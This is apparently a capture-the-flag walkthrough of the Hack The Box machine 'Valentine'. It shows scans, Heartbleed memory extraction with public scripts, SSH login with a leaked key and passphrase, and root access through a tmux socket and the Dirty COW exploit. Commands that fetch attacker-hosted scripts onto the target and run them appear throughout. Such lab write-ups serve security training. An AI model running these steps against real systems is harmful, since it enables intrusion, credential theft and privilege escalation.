Valentine

Back

Ports scan

masscan

root@kali:~/HTB/Machines/Valentine# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.79 --rate=1000


Starting masscan 1.0.5 at 2019-11-27 19:03:03 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.79
Discovered open port 443/tcp on 10.10.10.79
Discovered open port 22/tcp on 10.10.10.79

nmap

root@kali:~/HTB/Machines/Valentine# nmap -A -T4 -v 10.10.10.79
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-27 14:03 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
Initiating Ping Scan at 14:03
Scanning 10.10.10.79 [4 ports]
Completed Ping Scan at 14:03, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:03
Scanning valentine.htb (10.10.10.79) [1000 ports]
Discovered open port 80/tcp on 10.10.10.79
Discovered open port 443/tcp on 10.10.10.79
Discovered open port 22/tcp on 10.10.10.79
Completed SYN Stealth Scan at 14:03, 0.72s elapsed (1000 total ports)
Initiating Service scan at 14:03
Scanning 3 services on valentine.htb (10.10.10.79)
Completed Service scan at 14:03, 12.32s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against valentine.htb (10.10.10.79)
adjust_timeouts2: packet supposedly had rtt of -206422 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -206422 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -206632 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -206632 microseconds.  Ignoring time.
Retrying OS detection (try #2) against valentine.htb (10.10.10.79)
adjust_timeouts2: packet supposedly had rtt of -407787 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -407787 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -832859 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -832859 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -883359 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -883359 microseconds.  Ignoring time.
Initiating Traceroute at 14:03
Completed Traceroute at 14:03, 0.06s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 14:03
Completed Parallel DNS resolution of 2 hosts. at 14:03, 0.19s elapsed
NSE: Script scanning 10.10.10.79.
Initiating NSE at 14:03
Completed NSE at 14:03, 2.75s elapsed
Initiating NSE at 14:03
Completed NSE at 14:03, 0.52s elapsed
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
Nmap scan report for valentine.htb (10.10.10.79)
Host is up (0.045s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Issuer: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2018-02-06T00:45:25
| Not valid after:  2019-02-06T00:45:25
| MD5:   a413 c4f0 b145 2154 fb54 b2de c7a9 809d
|_SHA-1: 2303 80da 60e7 bde7 2ba6 76dd 5214 3c3c 6f53 01b1
|_ssl-date: 2019-11-27T19:03:46+00:00; 0s from scanner time.
Aggressive OS guesses: Nokia N9 phone (Linux 2.6.32) (94%), Linux 3.0 (94%), Linux 3.2 (94%), Linux 2.6.32 - 3.5 (94%), Linux 2.6.38 - 3.0 (92%), Linux 2.6.38 (92%), Linux 2.6.38 - 2.6.39 (92%), Linux 2.6.39 (92%), Linux 3.5 (91%), Linux 3.8 (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.001 days (since Wed Nov 27 14:02:30 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


TRACEROUTE (using port 256/tcp)
HOP RTT      ADDRESS
1   44.75 ms 10.10.14.1
2   44.79 ms valentine.htb (10.10.10.79)


NSE: Script Post-scanning.
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.06 seconds
           Raw packets sent: 1098 (52.860KB) | Rcvd: 2489 (100.994KB)	   

Check for vulnerabilities.

root@kali:~/HTB/Machines/Valentine# nmap --script vuln 10.10.10.79
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-27 14:04 EST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for valentine.htb (10.10.10.79)
Host is up (0.047s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp  open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_  /index/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
443/tcp open  https
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_  /index/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.openssl.org/news/secadv_20140605.txt
|_      http://www.cvedetails.com/cve/2014-0224
| ssl-heartbleed:
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://cvedetails.com/cve/2014-0160/
|_      http://www.openssl.org/news/secadv_20140407.txt
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.securityfocus.com/bid/70574
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://www.imperialviolet.org/2014/10/14/poodle.html
|_sslv2-drown:


Nmap done: 1 IP address (1 host up) scanned in 59.47 seconds

As expected, the target is vulnerable to heartbleed vulnerability.

Web enumeration

root@kali:~/HTB/Machines/Valentine# curl -k https://valentine.htb/
<center><img src="omg.jpg"/></center>

The image confirms that is a Heartbleed case, but doesn't give us more hints.

root@kali:~/HTB/Machines/Valentine# curl -k https://valentine.htb/omg.jpg --output omg.jpg
 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed
100  149k  100  149k    0     0   416k      0 --:--:-- --:--:-- --:--:--  416k
root@kali:~/HTB/Machines/Valentine# strings omg.jpg
JFIF
 , #&')*)
-0-(0%()(
...

Dirsearch

Dirsearch give us usefull information

root@kali:~/HTB/Machines/Valentine# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 1000 -u http://10.10.10.79


 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

 
Extensions: php, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562


Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-27_14-56-18.log


Target: http://10.10.10.79


[14:56:18] Starting:
[14:56:19] 200 -   38B  - /index.php
[14:56:19] 200 -   38B  - /index/
[14:56:19] 403 -  285B  - /icons/
[14:56:26] 200 -    1KB - /dev/
[14:56:30] 403 -  287B  - /cgi-bin/
[14:56:38] 403 -  283B  - /doc/
[14:58:49] 200 -  554B  - /encode.php
[14:58:49] 200 -  554B  - /encode/
[14:58:55] 200 -  552B  - /decode.php
[14:58:57] 200 -  552B  - /decode/
[15:06:53] 403 -  293B  - /server-status/


Task Completed

Encode and decode

Encode and decode pages seem to be simple base64 encoders and decoders.

Dev folder

The notes file:

root@kali:~/HTB/Machines/Valentine# curl -k https://valentine.htb/dev/notes.txt
To do:


1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

Hype_key file.

root@kali:~/HTB/Machines/Valentine# curl -k https://valentine.htb/dev/hype_key --output hype_key
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  5383  100  5383    0     0  29415      0 --:--:-- --:--:-- --:--:-- 29415
root@kali:~/HTB/Machines/Valentine# cat hype_key
2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 52 49 56 ...

The file hype_key is an hexadecimal file.

root@kali:~/HTB/Machines/Valentine# xxd -r -p hype_key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46


DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----

The hexadecimal file is an encrypted private key. We store it.

root@kali:~/HTB/Machines/Valentine# xxd -r -p hype_key > hype_key_clear
root@kali:~/HTB/Machines/Valentine# chmod 600 hype_key_clear

CVE-2014-0160

search exploit

root@kali:~/HTB/Machines/Valentine# searchsploit heartbleed
-------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                            |  Path
                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------- ----------------------------------------
OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure ( | exploits/multiple/remote/32764.py
OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (1)       | exploits/multiple/remote/32791.c
OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (2) (DTLS | exploits/multiple/remote/32998.c
OpenSSL TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure          | exploits/multiple/remote/32745.py
-------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

32764.py and 32745.py

The 2 scripts have the same behavior.

root@kali:~/HTB/Machines/Valentine# python 32764.py 10.10.10.79
Trying SSL 3.0...
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0300, length = 94
 ... received message: type = 22, ver = 0300, length = 885
 ... received message: type = 22, ver = 0300, length = 331
 ... received message: type = 22, ver = 0300, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0300, length = 16384
Received heartbeat response:
 0000: 02 40 00 D8 03 00 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
 0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
 0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
 0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
 0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
 0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
 0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
 0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
 0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
 0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
 00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
 00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
 00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
...

They leak memory information. After several attempts, we can catch some useful information.

 00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
 00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
 00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 30 2E 30 2E  ....#.......0.0.
 00e0: 31 2F 64 65 63 6F 64 65 2E 70 68 70 0D 0A 43 6F  1/decode.php..Co
 00f0: 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C  ntent-Type: appl
 0100: 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F  ication/x-www-fo
 0110: 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A 43  rm-urlencoded..C
 0120: 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34  ontent-Length: 4
 0130: 32 0D 0A 0D 0A 24 74 65 78 74 3D 61 47 56 68 63  2....$text=aGVhc
 0140: 6E 52 69 62 47 56 6C 5A 47 4A 6C 62 47 6C 6C 64  nRibGVlZGJlbGlld
 0150: 6D 56 30 61 47 56 6F 65 58 42 6C 43 67 3D 3D 00  mV0aGVoeXBlCg==.
 0160: DB 1E DE 15 D9 A1 1A 50 6E 3A 7F D8 0D 7E A3 1E  .......Pn:...~..
 0170: 5D 0F CC 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ]...............
 0180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
 0190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

heartbleed.py

The previous scripts needed several attemps and were very uncomfortable to read. This second script allows more options.

root@kali:~/HTB/Machines/Valentine# mkdir CVE2014-0160
root@kali:~/HTB/Machines/Valentine# cd CVE2014-0160/
root@kali:~/HTB/Machines/Valentine/CVE2014-0160# wget https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
--2019-11-28 15:33:52--  https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 199.232.32.133
Connecting to gist.githubusercontent.com (gist.githubusercontent.com)|199.232.32.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18230 (18K) [text/plain]
Saving to: ‘heartbleed.py’


heartbleed.py                                     100%[===========================================================================================================>]  17.80K  --.-KB/s    in 0.02s


2019-11-28 15:33:53 (1.10 MB/s) - ‘heartbleed.py’ saved [18230/18230]

These are the available options:

root@kali:~/HTB/Machines/Valentine/CVE2014-0160# python heartbleed.py


defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)
Usage: heartbleed.py server [options]


Test and exploit TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)


Options:
 -h, --help            show this help message and exit
 -p PORT, --port=PORT  TCP port to test (default: 443)
 -n NUM, --num=NUM     Number of times to connect/loop (default: 1)
 -s, --starttls        Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...
 -f FILEIN, --filein=FILEIN
                       Specify input file, line delimited, IPs or hostnames
                       or IP:port or hostname:port
 -v, --verbose         Enable verbose output
 -x, --hexdump         Enable hex output
 -r RAWOUTFILE, --rawoutfile=RAWOUTFILE
                       Dump the raw memory contents to a file
 -a ASCIIOUTFILE, --asciioutfile=ASCIIOUTFILE
                       Dump the ascii contents to a file
 -d, --donotdisplay    Do not display returned data on screen
 -e, --extractkey      Attempt to extract RSA Private Key, will exit when
                       found. Choosing this enables -d, do not display
                       returned data on screen.

We will run it several times and output to a file.

root@kali:~/HTB/Machines/Valentine/CVE2014-0160# python heartbleed.py -n 100 -d  -r out.raw 10.10.10.79


defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)


##################################################################
Connecting to: 10.10.10.79:443, 100 times
Sending Client Hello for TLSv1.0
Received Server Hello for TLSv1.0


WARNING: 10.10.10.79:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 100 of 100
##################################################################

After 100 loops, the scripts generates 1,6MBytes of raw data

root@kali:~/HTB/Machines/Valentine/CVE2014-0160# ls -lh out.raw
-rw-r--r-- 1 root root 1.6M Nov 28 15:44 out.raw

We find the same html form leaked form the memory. The result is the same as the previous scripts, but this one is more friendly.

root@kali:~/HTB/Machines/Valentine/CVE2014-0160# strings out.raw
0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==

Decode information leaked

We can use the application decoder.

Or easier, because the encoding is trivial, decrypt the base64 text.

root@kali:~/HTB/Machines/Valentine/CVE2014-0160# echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
heartbleedbelievethehype

User Flag

With the RSA key, a password and a possible user, we try a ssh login.

root@kali:~/HTB/Machines/Valentine# ssh -i hype_key_clear hype@10.10.10.79
The authenticity of host '10.10.10.79 (10.10.10.79)' can't be established.
ECDSA key fingerprint is SHA256:lqH8pv30qdlekhX8RTgJTq79ljYnL2cXflNTYu8LS5w.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.79' (ECDSA) to the list of known hosts.
Enter passphrase for key 'hype_key_clear':
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)


* Documentation:  https://help.ubuntu.com/


New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Last login: Thu Nov 28 13:04:22 2019 from 10.10.14.34
hype@Valentine:~$ cat Desktop/user.txt
<USER_FLAG>

User escalation

Upload Linux Enumeration script

root@kali:~/HTB/Machines/Valentine# cp ../../Utils/LinEnum/LinEnum.sh ./
root@kali:~/HTB/Machines/Valentine# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

From the target

hype@Valentine:/tmp$ wget -q http://10.10.14.34/LinEnum.sh
hype@Valentine:/tmp$ chmod +x LinEnum.sh
hype@Valentine:/tmp$ ./LinEnum.sh
...

Full Linux Enumeration output

Points of interest from enumeration

# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
[-] Current user's history files:
-rw------- 1 hype hype 164 Nov 28 13:10 /home/hype/.bash_history




[-] Location and contents (if accessible) of .bash_history file(s):
/home/hype/.bash_history


exit
exot
exit
ls -la
cd /
ls -la
cd .devs
ls -la
tmux -L dev_sess
tmux a -t dev_sess
tmux --help
tmux -S /.devs/dev_sess
exit
ls -l
cat Desktop/user.txt
exit

Escalation

If we check the bash history of the user hype

hype@Valentine:~$ cat .bash_history
exit
exot
exit
ls -la
cd /
ls -la
cd .devs
ls -la
tmux -L dev_sess
tmux a -t dev_sess
tmux --help
tmux -S /.devs/dev_sess
exit
ls -l
cat Desktop/user.txt
exit

There is a tmux session that is opened with user root.

hype@Valentine:/tmp$ ps -ef | grep tmux
root       1032      1  0 Nov28 ?        00:00:27 /usr/bin/tmux -S /.devs/dev_sess
hype       8234   7945  0 07:02 pts/1    00:00:00 grep --color=auto tmux
hype@Valentine:/tmp$ ls -l /.devs/dev_sess
srw-rw---- 1 root hype 0 Nov 28 08:57 /.devs/dev_sess

And the session is readable by group hype and the SetUID Flag is ON, and the owner is root.

hype@Valentine:/tmp$ /usr/bin/tmux -S /.devs/dev_sess
root@Valentine:/tmp# whoami
root

User escalation (CVE-2016-5195)

Alternative way to escalate privileges.

Upload Linux exploit suggester

Check if our HTTP server is up.

root@kali:~/HTB/Machines/Valentine# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.79 - - [29/Nov/2019 08:56:19] "GET /LinEnum.sh HTTP/1.1" 200 -

From the target, upload the script file

hype@Valentine:~$ wget -q http://10.10.14.34/linux-exploit-suggester.sh
hype@Valentine:~$ chmod +x linux-exploit-suggester.sh
hype@Valentine:~$ ./linux-exploit-suggester.sh > les

Retrieve the file

root@kali:~/HTB/Machines/Valentine# scp -i hype_key_clear hype@10.10.10.79:/home/hype/les ./
Enter passphrase for key 'hype_key_clear':
les                                                              100% 7621   161.6KB/s   00:00

Full Linux exploit suggester file

Interresting exploit in les file

[+] [CVE-2016-5195] dirtycow 2


   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847.cpp
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

Search exploit

root@kali:~/HTB/Machines/Valentine# searchsploit dirty cow
----------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                         |  Path
                                                                                                                       | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)                                                 | exploits/linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)                                                 | exploits/linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)     | exploits/linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)        | exploits/linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)                           | exploits/linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)     | exploits/linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)                            | exploits/linux/local/40611.c
----------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

The kernel is under 3.9

hype@Valentine:/tmp$ uname -a
Linux Valentine 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

exploit:

root@kali:~/HTB/Machines/Valentine# searchsploit -m 40839
 Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
     URL: https://www.exploit-db.com/exploits/40839
    Path: /usr/share/exploitdb/exploits/linux/local/40839.c
File Type: C source, ASCII text, with CRLF line terminators

 
Copied to: /root/HTB/Machines/Valentine/40839.c

Instructions from the file

root@kali:~/HTB/Machines/Valentine# vi 40839.c
// Compile with:
//   gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
//   "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."

Upload and compile the exploit

hype@Valentine:~$ wget -q http://10.10.14.34/40839.c
hype@Valentine:~$ gcc -pthread 40839.c -o dirty -lcrypt

Run the exploit

hype@Valentine:~$ ./dirty easypassword
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: easypassword
Complete line:
firefart:fi5FgEvdhZiPQ:0:0:pwned:/root:/bin/bash


mmap: 7f31da7ac000
madvise 0


ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'easypassword'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'easypassword'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

